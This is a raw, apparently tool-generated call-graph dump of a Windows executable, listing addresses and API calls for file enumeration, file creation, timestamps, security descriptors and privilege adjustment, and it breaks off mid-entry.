73537->73633 73553 6d20a0 __EH_prolog 73538->73553 73539 6d21f0 73540 6d2209 73539->73540 73542 6b1e0c ctype 2 API calls 73539->73542 73543 6b1e0c ctype 2 API calls 73540->73543 73541 6b2e04 2 API calls 73541->73553 73542->73540 73544 6d2235 73543->73544 73545 6d2248 73544->73545 74313 6c4250 73544->74313 74331 6d2c22 73545->74331 73546 6b2f1c 2 API calls 73546->73553 73549 6b1e40 free ctype 73549->73553 73551 6b6c72 44 API calls 73551->73553 73552 6d224c 74509 6b757d GetLastError 73552->74509 73553->73539 73553->73541 73553->73546 73553->73549 73553->73551 73553->73552 73555 6d2251 73553->73555 74508 6c089e malloc _CxxThrowException free _CxxThrowException memcpy 73553->74508 74510 6d2c6c 6 API calls 2 library calls 73555->74510 73558 6d2277 74511 6b1e40 free 73558->74511 73561 6d227f 74512 6b1e40 free 73561->74512 73562 6d2347 74530 6b1e40 free 73562->74530 73563 6b2e04 2 API calls 73582 6d232b 73563->73582 73567 6d2287 74513 6b1e40 free 73567->74513 73568 6d228f 73568->73299 73568->73300 73570 6b6c72 44 API calls 73570->73582 73571 6d2969 74527 6b757d GetLastError 73571->74527 73575 6d2836 74518 6b1e40 free 73575->74518 73582->73562 73582->73563 73582->73570 73582->73571 73582->73575 73583 6d2855 73582->73583 73587 6d289d 73582->73587 73598 6d3247 free 73582->73598 73600 6b2f1c 2 API calls 73582->73600 73605 6d28e6 73582->73605 73611 6b2fec malloc _CxxThrowException free 73582->73611 73613 6d2921 73582->73613 73616 6b1e40 free ctype 73582->73616 73626 6b1fa0 fputc 73582->73626 74335 6c47dd 73582->74335 74339 6e6086 73582->74339 74351 6d2b09 73582->74351 74357 6d31d8 73582->74357 74363 6d2a72 73582->74363 74367 6e6359 73582->74367 74410 6d2cdb 73582->74410 74496 6d2bb5 73582->74496 74514 6c3e26 30 API calls 2 library calls 73582->74514 74515 6b6456 9 API calls 2 library calls 73582->74515 74516 6b859e malloc _CxxThrowException free _CxxThrowException 73582->74516 74517 6d204d CharUpperW 73582->74517 74519 6b1e40 free 73583->74519 73598->73582 73600->73582 74523 6b1e40 free 73605->74523 73611->73582 74525 6b1e40 free 73613->74525 73616->73582 73626->73582 73632->73262 73633->73297 73634->73293 73673->73257 73674->73261 73675->73263 73676->73268 73677->73271 73679 6d324e 73678->73679 73680 6d3260 73679->73680 75787 6b1e40 free 73679->75787 75786 6b1e40 free 73680->75786 73683 6d3267 73684 6b1e40 free 73683->73684 73684->73278 73685->73282 73686->73286 73687->73290 73688->73399 73690 6d0224 __EH_prolog 73689->73690 73746 6c3d66 73690->73746 73693 6d062e 73699 6d0638 __EH_prolog 73693->73699 73694 6d06de 73833 6d019a malloc _CxxThrowException free memcpy 73694->73833 73696 6d06e6 73834 6d1453 26 API calls 2 library calls 73696->73834 73697 6d01bc malloc _CxxThrowException free _CxxThrowException memcpy 73697->73699 73699->73694 73699->73697 73702 6d06ee 73699->73702 73762 6d0703 73699->73762 73832 6e2db9 free ctype 73699->73832 73702->73410 73702->73424 73703->73413 73704->73418 73705->73424 73707 6f04df 73706->73707 73708 6f0513 73706->73708 73709 6f04fd 73707->73709 73710 6f04e8 _CxxThrowException 73707->73710 73708->73424 74176 6f0551 malloc _CxxThrowException free memcpy ctype 73709->74176 73710->73709 73712->73424 73713->73424 73714->73416 73715->73421 73717 6b9245 73716->73717 74177 6b90da 73717->74177 73720->73438 73721->73438 73722->73428 73724 6d19e1 73723->73724 73726 6d7ec6 73723->73726 73727 6c12d4 73724->73727 73725 6b1e40 free ctype 73725->73726 73726->73724 73726->73725 73728 6c12e7 73727->73728 73734 6c1327 73727->73734 73729 6c12ef _CxxThrowException 73728->73729 73730 6c1304 73728->73730 73729->73730 74229 6b1e40 free 73730->74229 73732 6c130b 73733 6b1e0c ctype 2 API calls 73732->73733 73733->73734 73734->73435 73735->73448 73736->73443 73737->73446 73738->73418 73739->73452 73740->73455 73741->73457 73742->73459 73743->73461 73744->73463 73745->73465 73757 74fb10 73746->73757 73748 6c3d70 GetCurrentProcess 73758 6c3e04 73748->73758 73750 6c3d8d OpenProcessToken 73751 6c3d9e LookupPrivilegeValueW 73750->73751 73752 6c3de3 73750->73752 73751->73752 73753 6c3dc0 AdjustTokenPrivileges 73751->73753 73754 6c3e04 CloseHandle 73752->73754 73753->73752 73755 6c3dd5 GetLastError 73753->73755 73756 6c3def 73754->73756 73755->73752 73756->73693 73757->73748 73759 6c3e0d 73758->73759 73760 6c3e11 CloseHandle 73758->73760 73759->73750 73761 6c3e21 73760->73761 73761->73750 73786 6d070d __EH_prolog 73762->73786 73763 6d0e1d 73876 6d0416 18 API calls 2 library calls 73763->73876 73765 6d0ea6 73878 6fec78 free ctype 73765->73878 73766 6d0d11 73867 6b7496 7 API calls 2 library calls 73766->73867 73769 6d0c13 73864 6b1e40 free 73769->73864 73773 6d0de0 73872 6e2db9 free ctype 73773->73872 73774 6b2da9 2 API calls 73794 6d0ab5 73774->73794 73775 6d0e47 73775->73765 73877 6d117d 68 API calls 2 library calls 73775->73877 73776 6d0c83 73776->73763 73776->73766 73777 6d0b40 73777->73699 73780 6b2e04 2 API calls 73780->73786 73782 6b2e04 2 API calls 73782->73794 73786->73776 73786->73777 73786->73780 73793 6b2fec 3 API calls 73786->73793 73786->73794 73806 6f04d2 malloc _CxxThrowException free _CxxThrowException memcpy 73786->73806 73825 6b1524 malloc _CxxThrowException 73786->73825 73826 6d0b48 73786->73826 73828 6d0b26 73786->73828 73829 6b1e40 free ctype 73786->73829 73831 6e2db9 free ctype 73786->73831 73835 6b2da9 73786->73835 73838 6b2f4a malloc _CxxThrowException free ctype 73786->73838 73839 6b1089 malloc _CxxThrowException free _CxxThrowException 73786->73839 73840 6d13eb 5 API calls 2 library calls 73786->73840 73841 6d050b 73786->73841 73846 6d0021 GetLastError 73786->73846 73847 6b49bd 9 API calls 2 library calls 73786->73847 73848 6d0306 12 API calls 73786->73848 73849 6cff00 5 API calls 2 library calls 73786->73849 73850 6d057d 16 API calls 2 library calls 73786->73850 73851 6d0f8e 24 API calls 2 library calls 73786->73851 73852 6b472e CharUpperW 73786->73852 73853 6c8984 malloc _CxxThrowException free _CxxThrowException memcpy 73786->73853 73854 6d0ef4 68 API calls 2 library calls 73786->73854 73787 6d0e02 73875 6e2db9 free ctype 73787->73875 73788 6b2e04 2 API calls 73792 6d0d29 73788->73792 73792->73773 73792->73788 73796 6b2fec 3 API calls 73792->73796 73803 6d0df3 73792->73803 73808 6d0df8 73792->73808 73810 6b1e40 free ctype 73792->73810 73868 6b2f1c 73792->73868 73871 6d117d 68 API calls 2 library calls 73792->73871 73793->73786 73794->73769 73794->73774 73794->73782 73797 6b2fec 3 API calls 73794->73797 73802 6d050b 44 API calls 73794->73802 73809 6d0c79 73794->73809 73817 6b1e40 free ctype 73794->73817 73855 6b2f4a malloc _CxxThrowException free ctype 73794->73855 73860 6b1089 malloc _CxxThrowException free _CxxThrowException 73794->73860 73861 6d13eb 5 API calls 2 library calls 73794->73861 73862 6d0ef4 68 API calls 2 library calls 73794->73862 73863 6e2db9 free ctype 73794->73863 73865 6d0021 GetLastError 73794->73865 73796->73792 73797->73794 73802->73794 73873 6b1e40 free 73803->73873 73806->73786 73874 6b1e40 free 73808->73874 73866 6b1e40 free 73809->73866 73810->73792 73811 6d0b30 73857 6b1e40 free 73811->73857 73815 6d0b38 73858 6b1e40 free 73815->73858 73817->73794 73825->73786 73859 6e2db9 free ctype 73826->73859 73856 6b1e40 free 73828->73856 73829->73786 73831->73786 73832->73699 73833->73696 73834->73702 73879 6b2d4d 73835->73879 73838->73786 73839->73786 73840->73786 73885 6b6c72 73841->73885 73844 6d0575 73844->73786 73846->73786 73847->73786 73848->73786 73849->73786 73850->73786 73851->73786 73852->73786 73853->73786 73854->73786 73855->73794 73856->73811 73857->73815 73858->73777 73859->73828 73860->73794 73861->73794 73862->73794 73863->73794 73864->73777 73865->73794 73866->73776 73867->73792 73869 6b2ba6 2 API calls 73868->73869 73870 6b2f2c 73869->73870 73870->73792 73871->73792 73872->73777 73873->73808 73874->73787 73875->73777 73876->73775 73877->73775 73878->73777 73882 6b2ba6 73879->73882 73883 6b1e0c ctype 2 API calls 73882->73883 73884 6b2bbb 73883->73884 73884->73786 73887 6b6c7c __EH_prolog 73885->73887 73886 6b6cd3 73889 6b6ce2 73886->73889 73893 6b6d87 73886->73893 73887->73886 73888 6b6cb7 73887->73888 73890 6b2f88 3 API calls 73888->73890 73892 6b2f88 3 API calls 73889->73892 73891 6b6cc7 73890->73891 73891->73844 73983 6b2f88 73891->73983 73898 6b6cf5 73892->73898 73903 6b6f4a 73893->73903 74010 6b2e47 73893->74010 73896 6b2e47 2 API calls 73907 6b6dc0 73896->73907 73897 6b6d4a 74006 6b7b41 28 API calls 73897->74006 73898->73897 73900 6b6d0b 73898->73900 74005 6b9252 GetModuleHandleW GetProcAddress GetDiskFreeSpaceW 73900->74005 73901 6b6d5f 74007 6b764c 73901->74007 73902 6b6fd1 73909 6b6fed 73902->73909 73927 6b701d 73902->73927 73980 6b6ff2 73902->73980 73903->73902 73905 6b6f7e 73903->73905 74028 6b6bf5 73905->74028 73906 6b6d36 73906->73897 73911 6b6d3a 73906->73911 73918 6b6dfe 73907->73918 74014 6b3221 malloc _CxxThrowException free _CxxThrowException 73907->74014 73914 6b6bf5 11 API calls 73909->73914 73911->73891 73914->73980 73916 6b6fca 73922 6b6848 FindClose 73916->73922 73917 6b6f99 73923 6b2f88 3 API calls 73917->73923 73919 6b6e43 73918->73919 73930 6b6e1e 73918->73930 73921 6b6c72 42 API calls 73919->73921 73925 6b6e4e 73921->73925 73922->73891 73926 6b6fb0 73923->73926 73928 6b6f3a 73925->73928 73929 6b6e41 73925->73929 74042 6b717b 13 API calls 73926->74042 73927->73980 74043 6b717b 13 API calls 73927->74043 74026 6b1e40 free 73928->74026 73936 6b2f1c 2 API calls 73929->73936 73930->73929 73933 6b2fec 3 API calls 73930->73933 73933->73929 73935 6b7052 73939 6b7056 73935->73939 73940 6b7064 73935->73940 73941 6b6e77 73936->73941 73937 6b6f42 74027 6b1e40 free 73937->74027 73942 6b2f88 3 API calls 73939->73942 73944 6b2e47 2 API calls 73940->73944 73943 6b2e04 2 API calls 73941->73943 73946 6b705f 73942->73946 73968 6b6e83 73943->73968 73945 6b706d 73944->73945 74044 6b1089 malloc _CxxThrowException free _CxxThrowException 73945->74044 73950 6b6848 FindClose 73946->73950 73949 6b707b 74045 6b1089 malloc _CxxThrowException free _CxxThrowException 73949->74045 73950->73891 73951 6b6ecf 74019 6b1e40 free 73951->74019 73953 6b6ec7 SetLastError 73953->73951 73954 6b7085 73957 6b6868 12 API calls 73954->73957 73959 6b7095 73957->73959 73958 6b6f11 74020 6b1e40 free 73958->74020 73962 6b7099 wcscmp 73959->73962 73963 6b70bb 73959->73963 73960 6b6ed3 74018 6b31e5 malloc _CxxThrowException free _CxxThrowException 73960->74018 73962->73963 73981 6b70b1 73962->73981 73966 6b6bf5 11 API calls 73963->73966 73965 6b6f19 74021 6b6848 73965->74021 73970 6b70c6 73966->73970 73968->73951 73968->73953 73968->73960 73972 6b2e04 2 API calls 73968->73972 74015 6b6bb5 17 API calls 73968->74015 74016 6b22bf CharUpperW 73968->74016 74017 6b1e40 free 73968->74017 73976 6b70d8 73970->73976 73970->73981 73971 6b2f88 3 API calls 73974 6b714c 73971->73974 73972->73968 74048 6b1e40 free 73974->74048 74046 6b1e40 free 73976->74046 73979 6b6f2b 74025 6b1e40 free 73979->74025 73980->73916 73989 6b6868 73980->73989 73981->73971 73984 6b2f9a 73983->73984 73985 6b2fbe 73984->73985 73986 6b1e0c ctype 2 API calls 73984->73986 73985->73844 73987 6b2fb4 73986->73987 74175 6b1e40 free 73987->74175 73990 6b6872 __EH_prolog 73989->73990 73991 6b6848 FindClose 73990->73991 73993 6b6880 73991->73993 73992 6b68f6 73992->73916 74047 6b717b 13 API calls 73992->74047 73993->73992 73994 6b689b FindFirstFileW 73993->73994 73995 6b68a9 73993->73995 73994->73995 73996 6b68ee 73995->73996 73997 6b2e04 2 API calls 73995->73997 73996->73992 74055 6b6919 malloc _CxxThrowException free 73996->74055 73999 6b68ba 73997->73999 74049 6b8b4a 73999->74049 74001 6b68d0 74002 6b68e2 74001->74002 74003 6b68d4 FindFirstFileW 74001->74003 74054 6b1e40 free 74002->74054 74003->74002 74005->73906 74006->73901 74008 6b7656 CloseHandle 74007->74008 74009 6b7661 74007->74009 74008->74009 74009->73891 74011 6b2e57 74010->74011 74012 6b2ba6 2 API calls 74011->74012 74013 6b2e6a 74012->74013 74013->73896 74014->73918 74015->73968 74016->73968 74017->73968 74018->73951 74019->73958 74020->73965 74022 6b6852 FindClose 74021->74022 74023 6b685d 74021->74023 74022->74023 74024 6b1e40 free 74023->74024 74024->73979 74025->73891 74026->73937 74027->73903 74029 6b6bff __EH_prolog 74028->74029 74030 6b6c19 GetFileAttributesW 74029->74030 74031 6b6c21 74029->74031 74030->74031 74041 6b6c5f 74030->74041 74032 6b2e04 2 API calls 74031->74032 74031->74041 74033 6b6c2d 74032->74033 74034 6b8b4a 9 API calls 74033->74034 74035 6b6c42 74034->74035 74036 6b6c5a 74035->74036 74037 6b6c49 GetFileAttributesW 74035->74037 74174 6b1e40 free 74036->74174 74173 6b1e40 free 74037->74173 74040 6b6c55 74040->74041 74041->73917 74041->73980 74042->73916 74043->73935 74044->73949 74045->73954 74046->73980 74047->73916 74048->73946 74056 6b8b80 74049->74056 74052 6b8b6e 74052->74001 74053 6b2f88 3 API calls 74053->74052 74054->73996 74055->73992 74058 6b8b8a __EH_prolog 74056->74058 74057 6b8b55 74057->74052 74057->74053 74058->74057 74059 6b8c7b 74058->74059 74065 6b8be1 74058->74065 74060 6b8d23 74059->74060 74062 6b8c8f 74059->74062 74061 6b8e8a 74060->74061 74064 6b8d3b 74060->74064 74063 6b2e47 2 API calls 74061->74063 74062->74064 74068 6b8c9e 74062->74068 74066 6b8e96 74063->74066 74067 6b2e04 2 API calls 74064->74067 74065->74057 74069 6b2e47 2 API calls 74065->74069 74074 6b2e47 2 API calls 74066->74074 74070 6b8d43 74067->74070 74071 6b2e47 2 API calls 74068->74071 74072 6b8c05 74069->74072 74153 6b6332 6 API calls 2 library calls 74070->74153 74083 6b8ca7 74071->74083 74078 6b8c17 74072->74078 74079 6b8c24 74072->74079 74076 6b8eb8 74074->74076 74075 6b8d52 74106 6b8d56 74075->74106 74154 6b859e malloc _CxxThrowException free _CxxThrowException 74075->74154 74165 6b8f57 memmove 74076->74165 74143 6b1e40 free 74078->74143 74081 6b2e47 2 API calls 74079->74081 74086 6b8c35 74081->74086 74087 6b2e47 2 API calls 74083->74087 74085 6b8ec4 74088 6b8ec8 74085->74088 74089 6b8ede 74085->74089 74144 6b8f57 memmove 74086->74144 74093 6b8cd0 74087->74093 74166 6b1e40 free 74088->74166 74168 6b3221 malloc _CxxThrowException free _CxxThrowException 74089->74168 74148 6b8f57 memmove 74093->74148 74094 6b8ed0 74167 6b1e40 free 74094->74167 74095 6b8c41 74099 6b8c6b 74095->74099 74145 6b31e5 malloc _CxxThrowException free _CxxThrowException 74095->74145 74096 6b8eeb 74169 6b31e5 malloc _CxxThrowException free _CxxThrowException 74096->74169 74147 6b1e40 free 74099->74147 74100 6b8cdc 74103 6b8d13 74100->74103 74149 6b3221 malloc _CxxThrowException free _CxxThrowException 74100->74149 74152 6b1e40 free 74103->74152 74164 6b1e40 free 74106->74164 74107 6b8f06 74170 6b31e5 malloc _CxxThrowException free _CxxThrowException 74107->74170 74109 6b2e04 2 API calls 74115 6b8ddf 74109->74115 74110 6b8c60 74146 6b31e5 malloc _CxxThrowException free _CxxThrowException 74110->74146 74112 6b8d65 74112->74106 74112->74109 74113 6b8ced 74150 6b31e5 malloc _CxxThrowException free _CxxThrowException 74113->74150 74119 6b8e0e 74115->74119 74122 6b8df1 74115->74122 74117 6b8f11 74171 6b1e40 free 74117->74171 74124 6b2f88 3 API calls 74119->74124 74121 6b8d08 74151 6b31e5 malloc _CxxThrowException free _CxxThrowException 74121->74151 74155 6b3199 malloc _CxxThrowException free _CxxThrowException 74122->74155 74123 6b8c73 74172 6b1e40 free 74123->74172 74125 6b8e0c 74124->74125 74157 6b8f57 memmove 74125->74157 74129 6b8e03 74156 6b3199 malloc _CxxThrowException free _CxxThrowException 74129->74156 74130 6b8e22 74132 6b8e26 74130->74132 74133 6b8e3b 74130->74133 74158 6b3221 malloc _CxxThrowException free _CxxThrowException 74130->74158 74163 6b1e40 free 74132->74163 74159 6b8f34 malloc _CxxThrowException 74133->74159 74137 6b8e49 74160 6b31e5 malloc _CxxThrowException free _CxxThrowException 74137->74160 74139 6b8e56 74161 6b1e40 free 74139->74161 74141 6b8e62 74162 6b31e5 malloc _CxxThrowException free _CxxThrowException 74141->74162 74143->74057 74144->74095 74145->74110 74146->74099 74147->74123 74148->74100 74149->74113 74150->74121 74151->74103 74152->74123 74153->74075 74154->74112 74155->74129 74156->74125 74157->74130 74158->74133 74159->74137 74160->74139 74161->74141 74162->74132 74163->74106 74164->74057 74165->74085 74166->74094 74167->74057 74168->74096 74169->74107 74170->74117 74171->74123 74172->74057 74173->74040 74174->74041 74175->73985 74176->73708 74178 6b90e4 __EH_prolog 74177->74178 74179 6b2f88 3 API calls 74178->74179 74180 6b90f7 74179->74180 74181 6b915d 74180->74181 74186 6b9109 74180->74186 74182 6b2e04 2 API calls 74181->74182 74183 6b9165 74182->74183 74184 6b91be 74183->74184 74188 6b9174 74183->74188 74223 6b6332 6 API calls 2 library calls 74184->74223 74187 6b9155 74186->74187 74190 6b2e47 2 API calls 74186->74190 74187->73438 74191 6b2f88 3 API calls 74188->74191 74189 6b917d 74192 6b91ca 74189->74192 74221 6b859e malloc _CxxThrowException free _CxxThrowException 74189->74221 74193 6b9122 74190->74193 74191->74189 74228 6b1e40 free 74192->74228 74218 6b8f57 memmove 74193->74218 74196 6b912e 74199 6b914d 74196->74199 74219 6b31e5 malloc _CxxThrowException free _CxxThrowException 74196->74219 74198 6b9185 74202 6b2e04 2 API calls 74198->74202 74220 6b1e40 free 74199->74220 74203 6b9197 74202->74203 74204 6b919f 74203->74204 74205 6b91ce 74203->74205 74206 6b91b9 74204->74206 74222 6b1089 malloc _CxxThrowException free _CxxThrowException 74204->74222 74207 6b2f88 3 API calls 74205->74207 74224 6b3199 malloc _CxxThrowException free _CxxThrowException 74206->74224 74207->74206 74210 6b91e6 74225 6b8f57 memmove 74210->74225 74212 6b91ee 74213 6b91f2 74212->74213 74214 6b2fec 3 API calls 74212->74214 74227 6b1e40 free 74213->74227 74216 6b9212 74214->74216 74226 6b31e5 malloc _CxxThrowException free _CxxThrowException 74216->74226 74218->74196 74219->74199 74220->74187 74221->74198 74222->74206 74223->74189 74224->74210 74225->74212 74226->74213 74227->74192 74228->74187 74229->73732 74230->73470 74231->73471 74233 6b1e0c ctype 2 API calls 74232->74233 74234 6b26ea 74233->74234 74235 6e5678 74234->74235 74236 6e5689 74235->74236 74237 6e56b1 74235->74237 74239 6e5593 6 API calls 74236->74239 74253 6e5593 74237->74253 74241 6e56a5 74239->74241 74267 6b28a1 74241->74267 74245 6e570e fputs 74251 6b1fa0 fputc 74245->74251 74247 6e56ef 74248 6e5593 6 API calls 74247->74248 74249 6e5701 74248->74249 74250 6e5711 6 API calls 74249->74250 74250->74245 74251->73483 74252->73477 74254 6e55ad 74253->74254 74255 6b28a1 5 API calls 74254->74255 74256 6e55b8 74255->74256 74272 6b286d 74256->74272 74259 6b28a1 5 API calls 74260 6e55c7 74259->74260 74261 6e5711 74260->74261 74262 6e56e0 74261->74262 74263 6e5721 74261->74263 74262->74245 74271 6b2881 malloc _CxxThrowException free memcpy _CxxThrowException 74262->74271 74264 6b28a1 5 API calls 74263->74264 74265 6e572b 74264->74265 74280 6e55cd 6 API calls 74265->74280 74268 6b28b0 74267->74268 74268->74268 74281 6b267f 74268->74281 74270 6b28bf 74270->74237 74271->74247 74275 6b1e9d 74272->74275 74276 6b1ea8 74275->74276 74277 6b1ead 74275->74277 74279 6b263c malloc _CxxThrowException free memcpy _CxxThrowException 74276->74279 74277->74259 74279->74277 74280->74262 74282 6b26c2 74281->74282 74284 6b2693 74281->74284 74282->74270 74283 6b26c8 _CxxThrowException 74286 6b26dd 74283->74286 74284->74283 74285 6b26bc 74284->74285 74290 6b2595 malloc _CxxThrowException free memcpy ctype 74285->74290 74288 6b1e0c ctype 2 API calls 74286->74288 74289 6b26ea 74288->74289 74289->74270 74290->74282 74291->73490 74301 6b1e40 free 74292->74301 74294 6d2c16 74302 6b1e40 free 74294->74302 74296 6d2c1e 74297 6b1e40 free 74296->74297 74297->73494 74298->73496 74299->73498 74300->73500 74301->74294 74302->74296 74303->73510 74305 6ead33 __EH_prolog 74304->74305 74306 6b2e04 2 API calls 74305->74306 74307 6ead5f 74306->74307 74308 6b2e04 2 API calls 74307->74308 74309 6ea5d8 74308->74309 74309->73517 74310->73526 74311->73527 74312->73527 74314 6c425a __EH_prolog 74313->74314 74315 6b2e04 2 API calls 74314->74315 74316 6c42c4 74315->74316 74317 6b2e04 2 API calls 74316->74317 74318 6c42d0 74317->74318 74332 6d2c2e 74331->74332 74334 6d2c35 74331->74334 74333 6b1e0c ctype 2 API calls 74332->74333 74333->74334 74334->73582 74336 6c47ee 74335->74336 74337 6c47f4 74335->74337 74337->73582 74340 6e6092 74339->74340 74411 6d2ce5 __EH_prolog 74410->74411 74497 6d2bbf __EH_prolog 74496->74497 74508->73553 74509->73555 74510->73558 74511->73561 74512->73567 74513->73568 74514->73582 74515->73582 74516->73582 74517->73582 74518->73562 75786->73683 75787->73679 75791 7369f0 free 75792 6c1368 75795 6c136d 75792->75795 75794 6c138c 75795->75794 75798 747d80 WaitForSingleObject 75795->75798 75801 6ef745 75795->75801 75805 747ea0 SetEvent GetLastError 75795->75805 75799 747d8e GetLastError 75798->75799 75800 747d98 75798->75800 75799->75800 75800->75795 75802 6ef74f __EH_prolog 75801->75802 75806 6ef784 75802->75806 75804 6ef765 75804->75795 75805->75795 75807 6ef78e __EH_prolog 75806->75807 75808 6c12d4 4 API calls 75807->75808 75809 6ef7c7 75808->75809 75810 6c12d4 4 API calls 75809->75810 75811 6ef7d4 75810->75811 75812 6ef871 75811->75812 75815 736b23 VirtualAlloc 75811->75815 75816 6bc4d6 75811->75816 75812->75804 75815->75812 75820 6bc4e9 75816->75820 75817 6bc6f3 75817->75812 75820->75817 75821 6bc695 memmove 75820->75821 75822 6c111c 75820->75822 75827 6c11b4 75820->75827 75821->75820 75823 6c1130 75822->75823 75824 6c115f 75823->75824 75832 6bb668 75823->75832 75851 6bd331 75823->75851 75824->75820 75828 6c11c1 75827->75828 75829 6c11eb 75828->75829 75863 6faf27 75828->75863 75870 6fae7c 75828->75870 75829->75820 75840 6bb675 75832->75840 75833 6bb864 75855 6b7b7c 75833->75855 75836 6bb8aa GetLastError 75837 6bb6aa 75836->75837 75837->75823 75838 6bb81b 75838->75837 75842 6bb839 memcpy 75838->75842 75839 6bb7e7 75839->75833 75844 6b7731 5 API calls 75839->75844 75840->75833 75840->75837 75840->75838 75840->75839 75841 6b7731 5 API calls 75840->75841 75843 6bb811 75840->75843 75845 6bb7ad 75840->75845 75860 6b7b4f ReadFile 75840->75860 75841->75840 75842->75837 75861 6bb8ec GetLastError 75843->75861 75846 6bb80d 75844->75846 75845->75840 75850 6bb8c7 75845->75850 75859 736a20 VirtualAlloc 75845->75859 75846->75833 75846->75843 75850->75837 75852 6bd355 75851->75852 75853 6bd374 75852->75853 75854 6bb668 10 API calls 75852->75854 75853->75823 75854->75853 75856 6b7b89 75855->75856 75862 6b7b4f ReadFile 75856->75862 75858 6b7b9a 75858->75836 75858->75837 75859->75845 75860->75840 75861->75837 75862->75858 75864 6faf36 75863->75864 75865 6fad3a 99 API calls 75864->75865 75866 6fb010 75864->75866 75868 6faeeb 107 API calls 75864->75868 75875 6bbd0c 75864->75875 75880 6faebf 107 API calls 75864->75880 75865->75864 75866->75828 75868->75864 75871 6fae86 75870->75871 75873 6c7140 7 API calls 75871->75873 75889 6c7190 75871->75889 75872 6faebb 75872->75828 75873->75872 75881 6b7ca2 75875->75881 75878 6bbd3d 75878->75864 75880->75864 75884 6b7caf 75881->75884 75883 6b7cdb 75883->75878 75885 6bb8ec GetLastError 75883->75885 75884->75883 75886 6b7c68 75884->75886 75885->75878 75887 6b7c79 WriteFile 75886->75887 75888 6b7c76 75886->75888 75887->75884 75888->75887 75890 6c719a __EH_prolog 75889->75890 75891 6c71b0 75890->75891 75894 6c71dd 75890->75894 75892 6c4d78 VariantClear 75891->75892 75898 6c71b7 75892->75898 75902 6c6fc5 75894->75902 75895 6c72b4 75896 6c4d78 VariantClear 75895->75896 75897 6c72c0 75895->75897 75896->75897 75897->75898 75899 6c7140 7 API calls 75897->75899 75898->75872 75899->75898 75900 6c7236 75900->75895 75900->75898 75901 6c72a3 SetFileSecurityW 75900->75901 75901->75895 75903 6c6fcf __EH_prolog 75902->75903 75904 6c44a6 2 API calls 75903->75904 75907 6c6fec 75904->75907 75905 6c7029 75912 6c706a 75905->75912 75944 6c4dff 7 API calls 2 library calls 75905->75944 75907->75905 75907->75912 75943 6c6e71 12 API calls 2 library calls 75907->75943 75911 6c7051 75911->75912 75914 6c11b4 107 API calls 75911->75914 75925 6c68ac 75912->75925 75914->75912 75915 6c710b 75915->75900 75916 6b6096 15 API calls 75917 6c70d1 75916->75917 75918 6c70e2 75917->75918 75945 6c4dff 7 API calls 2 library calls 75917->75945 75922 6c709e 75918->75922 75946 6c6b5e 69 API calls 2 library calls 75918->75946 75921 6c70fd 75921->75922 75923 6c7103 75921->75923 75948 6b1e40 free 75922->75948 75947 6b1e40 free 75923->75947 75926 6c68b6 __EH_prolog 75925->75926 75928 6c6921 75926->75928 75929 6b7d4b 6 API calls 75926->75929 75940 6c68c5 75926->75940 75927 6c6962 75934 6c6998 75927->75934 75952 6b2dcd malloc _CxxThrowException 75927->75952 75928->75927 75928->75934 75951 6c6a17 6 API calls 2 library calls 75928->75951 75932 6c6906 75929->75932 75932->75928 75950 6c4dff 7 API calls 2 library calls 75932->75950 75933 6c69e1 75955 6bbcf8 CloseHandle 75933->75955 75934->75933 75949 6b7c3b SetFileTime 75934->75949 75937 6c697a 75953 6c6b09 13 API calls __EH_prolog 75937->75953 75940->75916 75940->75922 75941 6c698c 75954 6b1e40 free 75941->75954 75943->75905 75944->75911 75945->75918 75946->75921 75947->75915 75948->75915 75949->75933 75950->75928 75951->75927 75952->75937 75953->75941 75954->75934 75955->75940 75956 74ffb1 __setusermatherr 75957 74ffbd 75956->75957 75961 750068 _controlfp 75957->75961 75959 74ffc2 _initterm __getmainargs _initterm __p___initenv 75960 6ec27c 75959->75960 75961->75959 75962 6ec2e6 75963 6ec52f 75962->75963 75966 6e544f SetConsoleCtrlHandler 75963->75966 75965 6ec53b 75966->75965 75967 6fbf67 75968 6fbf85 75967->75968 75969 6fbf74 75967->75969 75969->75968 75973 6fbf8c 75969->75973 75974 6fbf96 __EH_prolog 75973->75974 75990 6fd144 75974->75990 75978 6fbfd0 75997 6b1e40 free 75978->75997 75980 6fbfdb 75998 6b1e40 free 75980->75998 75982 6fbfe6 75999 6fc072 free ctype 75982->75999 75984 6fbff4 76000 6caafa free VariantClear ctype 75984->76000 75986 6fc023 76001 6d73d2 free VariantClear __EH_prolog ctype 75986->76001 75988 6fbf7f 75989 6b1e40 free 75988->75989 75989->75968 75992 6fd14e __EH_prolog 75990->75992 76002 6fd1b7 75992->76002 75995 6fbfc5 75996 6b1e40 free 75995->75996 75996->75978 75997->75980 75998->75982 75999->75984 76000->75986 76001->75988 76010 6fd23c 76002->76010 76004 6fd1ed 76017 6b1e40 free 76004->76017 76006 6fd209 76018 6b1e40 free 76006->76018 76008 6fd180 76009 6f8e04 memset 76008->76009 76009->75995 76019 6fd2b8 76010->76019 76013 6fd25e 76036 6b1e40 free 76013->76036 76016 6fd275 76016->76004 76017->76006 76018->76008 76038 6b1e40 free 76019->76038 76021 6fd2c8 76039 6b1e40 free 76021->76039 76023 6fd2dc 76040 6b1e40 free 76023->76040 76025 6fd2e7 76041 6b1e40 free 76025->76041 76027 6fd2f2 76042 6b1e40 free 76027->76042 76029 6fd2fd 76043 6b1e40 free 76029->76043 76031 6fd308 76044 6b1e40 free 76031->76044 76033 6fd313 76034 6fd246 76033->76034 76045 6b1e40 free 76033->76045 76034->76013 76037 6b1e40 free 76034->76037 76036->76016 76037->76013 76038->76021 76039->76023 76040->76025 76041->76027 76042->76029 76043->76031 76044->76033 76045->76034 76046 6b7b20 76049 6b7ab2 76046->76049 76050 6b7ac5 76049->76050 76057 6b759a 76050->76057 76053 6b7b03 76071 6b7919 76053->76071 76054 6b7aeb SetFileTime 76054->76053 76058 6b75a4 __EH_prolog 76057->76058 76059 6b764c CloseHandle 76058->76059 76060 6b75af 76059->76060 76061 6b75e9 76060->76061 76062 6b75d4 CreateFileW 76060->76062 76063 6b7632 76060->76063 76061->76063 76064 6b2e04 2 API calls 76061->76064 76062->76061 76063->76053 76063->76054 76065 6b75fb 76064->76065 76066 6b8b4a 9 API calls 76065->76066 76067 6b7611 76066->76067 76068 6b762a 76067->76068 76069 6b7615 CreateFileW 76067->76069 76087 6b1e40 free 76068->76087 76069->76068 76072 6b7aac 76071->76072 76073 6b793c 76071->76073 76073->76072 76074 6b7945 DeviceIoControl 76073->76074 76075 6b7969 76074->76075 76076 6b79e6 76074->76076 76075->76076 76083 6b79a7 76075->76083 76077 6b79ef DeviceIoControl 76076->76077 76080 6b7a14 76076->76080 76078 6b7a22 DeviceIoControl 76077->76078 76077->76080 76079 